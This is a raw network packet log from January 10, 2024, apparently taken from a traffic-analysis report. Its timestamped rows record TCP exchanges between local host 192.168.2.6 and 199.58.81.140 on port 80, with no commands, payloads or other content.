            Jan 10, 2024 15:41:31.451344967 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.451364994 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.451390028 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.451420069 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.451462030 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.451493025 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.451534033 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.451550961 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.451592922 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.451605082 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.451647997 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.451678038 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.451719046 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.451749086 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.451788902 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.451797009 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.451841116 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.451942921 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.451987982 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.452028036 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.452070951 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.452107906 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.452151060 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.452166080 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.452205896 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.452215910 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.452258110 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.452260971 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.452289104 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.452331066 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.452348948 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.452414036 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.452455044 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.452461958 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.452507019 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.452512980 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.452563047 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.452604055 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.452635050 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.453145981 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.453198910 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.453290939 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.453336954 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.453932047 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.453984022 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.453994036 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.454022884 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.454092979 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.454092979 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.454098940 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.454138041 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.454139948 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.454175949 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.454206944 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.454246998 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.454268932 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.454296112 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.454320908 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.454363108 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.454513073 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.454560041 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.454569101 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.454618931 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.454663038 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.454694033 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.454735994 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.454735994 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.454796076 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.454830885 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.454840899 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.454874039 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.454893112 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.454941034 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.454982042 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.454986095 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.455322027 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.455372095 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.455385923 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.455426931 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.455457926 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.455495119 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.455538034 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.455701113 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.455769062 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.455812931 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.455815077 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.455909014 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.455952883 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.455981970 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.456022024 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.456279039 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.457541943 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.457597017 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.457601070 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.457638025 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.457655907 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.457735062 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.457778931 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.457840919 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.458070040 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.458084106 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.458096981 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.458110094 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.458129883 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.458141088 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.458158970 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.458297968 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.458339930 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.458383083 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.458415031 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.458425999 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.458465099 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.458492994 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.458508015 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.458553076 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.458623886 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.458636999 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.458683014 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.458688974 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.458731890 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.458749056 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.458790064 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.458800077 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.458841085 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.458846092 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.458887100 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.458916903 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.458957911 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.458997965 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.459038019 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.459055901 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.459100008 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.459101915 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.459141016 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.459170103 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.459211111 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.459211111 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.459273100 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.459315062 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.459327936 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.459395885 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.459436893 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.459620953 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.459669113 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.459685087 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.459809065 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.459853888 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.459882975 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.459911108 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.459954023 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.459997892 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.460022926 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.460040092 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.460064888 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.460906029 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.460968018 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.461219072 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.461293936 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.461339951 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.461347103 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.461410046 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.461424112 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.461456060 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.461477041 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.461508989 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.461549997 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.461579084 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.461591959 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.461615086 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.461652994 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.461692095 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.461709976 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.461777925 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.461816072 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.461818933 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.461854935 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.461906910 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.461963892 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.462007046 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.462022066 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.462037086 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.462078094 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.462106943 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.462153912 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.462177992 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.462217093 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.462260008 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.462276936 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.462330103 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.462372065 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.462555885 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.462702990 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.462749004 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.462868929 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.462940931 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.462982893 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.462996006 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.463011026 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.463037968 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.463080883 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.463108063 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.463129997 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.463150024 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.463167906 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.463217020 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.463255882 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.463313103 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.463355064 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.463423014 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.463463068 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.463480949 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.463520050 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.463527918 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.463571072 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.463574886 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.463615894 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.463645935 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.463675976 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.463685989 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.463715076 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.463733912 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.463774920 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.463782072 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.463820934 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.463824987 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.463865042 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.463881969 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.463922024 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.463926077 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.463968992 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.463987112 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.464025974 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.464032888 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.464071989 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.464081049 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.464122057 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.464138985 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.464181900 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.464199066 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.464241028 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.464253902 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.464297056 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.464298010 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.464335918 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.464345932 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.464385986 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.464401007 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.464442015 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.464482069 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.464499950 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.464567900 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.464610100 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.464651108 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.464960098 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.465006113 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.465023041 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.465070009 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.465073109 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.465306997 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.465353966 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.465370893 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.465439081 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.465481043 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.465559006 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.465869904 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.465913057 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.466010094 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.466046095 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.466088057 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.466118097 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.466157913 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.466160059 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.466222048 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.466263056 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.466344118 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.466423988 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.466464043 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.466470957 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.466538906 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.466582060 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.466612101 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.466654062 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.466759920 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.466876984 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.466919899 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.467122078 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.467159986 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.467204094 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.467206001 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.467245102 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.467262983 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.467605114 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.467650890 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.467650890 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.467720985 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.467761993 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.467772007 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.467812061 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.467870951 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.467952013 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.467989922 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.467995882 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.468156099 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.468199968 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.468229055 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.468298912 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.468339920 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.468358994 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.468399048 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.468415022 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.469136953 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.469187021 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.469189882 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.469228983 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.469269037 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.469299078 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.469336987 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.469338894 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.469382048 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.469424009 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.469440937 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.469494104 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.469532967 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.469563961 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.469645977 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.469688892 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.469842911 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.469876051 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.469883919 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.469917059 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.469942093 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.469988108 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.469991922 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.470030069 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.558609009 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.558636904 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.558684111 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.558706999 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.558742046 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.558769941 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.558815002 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.558856010 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.558904886 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.559016943 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.559061050 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.559349060 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.559391022 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.559420109 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.559585094 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.559629917 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.559885979 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.560041904 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.560087919 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.560106039 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.560230017 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.560278893 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.560380936 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.560421944 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.560451984 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.560497046 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.560535908 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.560565948 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.560724974 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.560767889 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.560914040 CET8049756199.58.81.140192.168.2.6
